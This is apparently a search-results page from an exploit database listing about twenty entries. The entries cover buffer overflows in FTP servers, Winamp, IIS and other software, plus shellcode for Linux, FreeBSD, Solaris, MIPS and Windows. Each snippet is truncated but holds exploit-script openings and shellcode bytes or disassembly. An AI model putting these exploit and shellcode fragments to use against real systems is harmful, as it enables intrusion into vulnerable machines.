7260 matches found
HP-UX 11 Software Distributor Lang Environment Variable Local Buffer Overrun Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8986/info HP has reported that some Software Distributor (SD) utilities are prone to a locally exploitable buffer-overrun vulnerability. Affected utilities include swinstall(1M) and swverify(1M). / Program : xhpux11isw.c Use :...
win32 SEH omelet shellcode 0.1
No description provided by source. A small piece of shellcode written in assembler that can scan the user-land address space for small blocks of memory ("eggs") and recombine the eggs into one large block. When done, the large block is executed. This is useful when you can only insert small blocks at...
Free MP3 CD Ripper 2.6 - 0day (2)
No description provided by source. Exploit Title: Free MP3 CD Ripper 2.6 0 day Date: 30/03/2010 Author: Richard leahy Reference: http://www.exploit-db.com/exploits/11975 Software Link: http://www.soft32.com/Download/Free/FreeMP3CDRipper/4-250188-1.html Version: 2.6 Tested on: Windows Xp Sp2 to...
Ada Image Server <= 0.6.7 imgsrv.exe Buffer Overflow
No description provided by source. !/usr/bin/python Only usable module with safeseh disabled on XP SP2 and XP SP3 is imgsrv.exe. However, it contains a null character in the address ex: XP SP3 = 00689aff. Versions above 0.6.7 do not seem to be vulnerable. $ ./imgsrv.py 192.168.1.146 Ada Image...
PSOProxy 0.91 Remote Buffer Overflow Vulnerability (2)
No description provided by source. source: http://www.securityfocus.com/bid/9706/info It has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to insufficient boundary checking. A malicious user may exploit this condition to potentially corrupt...
Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (2)
No description provided by source. source: http://www.securityfocus.com/bid/4485/info A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS (Internet Information Services). This condition affects IIS 4.0 and IIS 5.0...
PCMAN FTP 2.07 ABOR Command - Buffer Overflow Exploit
No description provided by source. Exploit Title: PCMAN FTP 2.07 ABOR Command Buffer Overflow Date: Jan 25,2014 Exploit Author: Mahmod Mahajna Mahy Version: 2.07 Tested on: Windows 7 sp1 x64 english Email: [email protected] import socket as s from sys import argv iflenargv != 4: print USAGE: %s...
Linux x86 - /bin/sh 8 bytes
No description provided by source. / 08048334 main: 8048334: 99 cltd 8048335: 6a 0b push $0xb 8048337: 58 pop %eax 8048338: 60 pusha 8048339: 59 pop %ecx 804833a: cd 80 int $0x80 using this code. step1. This code is compiled. step2. strace -x output binary step3. get execve args in strace result...
Macromedia Flash 6.0.47.0 SWRemote Heap Corruption Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/6196/info A buffer overrun condition has been discovered in the SWRemote parameter used in Macromedia Flash objects. By triggering the overrun it is possible for an attacker to corrupt sensitive heap memory. Exploiting th...
Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow
No description provided by source. !/usr/bin/env python Exploit Title: Easy File Sharing FTP Server 3.5 stack buffer overflow Date: 27 May 2014 Exploit Author: superkojiman - http://www.techorganic.com Vulnerability discovered by: h07 CVE: CVE-2006-3952 OSVDB: 27646 Vendor Homepage:...
Winamp <= 5.541 Skin Universal Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl WinAmp = 5.541 Skin Universal Buffer Overflow Exploit Discovered and Exploited by SkD [email protected] ----------------------------------------------------- WinAmp = http://www.winamp.com Who doesn't use WinAmp? This was an 0day for sometime but...
MIPS Linux XOR Shellcode Encoder (60 Bytes)
No description provided by source. include fcntl.h include stdio.h include unistd.h include sys/types.h include sys/stat.h include stdlib.h include string.h define DEBUG 0 / entropy at phiral.net mips linux shellcode xor encoder \xAB\xCD is overwritten with jmp back offset \x00\x00 is overwritten...
PSOProxy 0.91 Remote Buffer Overflow Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/9706/info It has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to insufficient boundary checking. A malicious user may exploit this condition to potentially corrupt...
freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 57 bytes
No description provided by source. ; sm4x - 2008 ; setuid0; execve//sbin/ipf, //sbin/ipf, -Faa, 0, 0; ; 57 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax push eax mov al, 0x17 int 0x80 ; --------------------- -Faa xor eax,...
Solaris/x86 - execve("/bin/sh","/bin/sh",NULL) - 27 bytes
No description provided by source. / Title: Solaris/x86 - execve/bin/sh,/bin/sh,NULL - 27 bytes Author: Jonathan Salwan submit AT shell-storm.org Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan Date: 2010-05-19 Tested: SunOS opensolaris 5.11 snv111b i86pc i386 i86pc...
Windows Seven Pro SP1 64 Fr (Beep) Shellcode 39 Bytes
No description provided by source. include stdio.h char shellcode = \x31\xC9 //xor ecx, ecx \x64\x8B\x71\x30 //mov esi, fs:ecx+0x30 \x8B\x76\x0C //mov esi, esi+0x0C \x8B\x76\x1C //mov esi, esi+0x1c \x8B\x06 //mov eax, esi \x8B\x68\x08 //mov ebp, eax+0x08 \x68\x11\x11\x11\x11 //push 0x11111111...
Winace UnAce 2.2 Command Line Argument Buffer Overflow Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/9002/info UnAce has been reported to be prone to a buffer overflow vulnerability. The issue presents itself when UnAce handles ace filenames that are of excessive length. When this filename is passed to the UnAce utility ...
Freefloat FTP Server MKD Buffer Overflow (MSF)
No description provided by source. require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initializeinfo = superupdateinfoinfo, 'Name' = 'Freefloat FTP Server MKD Command Stack Overflow', 'Description' = %q This module exploits a buff...
Linux kernel <= 2.2.18 ptrace/execve Race Condition Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/2529/info The Linux kernel is the core of all distributions of the Linux Operating System. It was originally written by Linus Torvalds, and is maintained by a community of developers. A problem in the Linux Kernel could...
Sielco Sistemi Winlog <= 2.07.16 Buffer Overflow
No description provided by source. !/usr/bin/ruby Exploit Title: Sielco Sistemi Winlog Buffer Overflow = v2.07.16 Date: 05.06.2012 Exploit Author: m1k3 Vendor Homepage: http://www.sielcosistemi.com/en/download/public/winloglite.html Software Link:...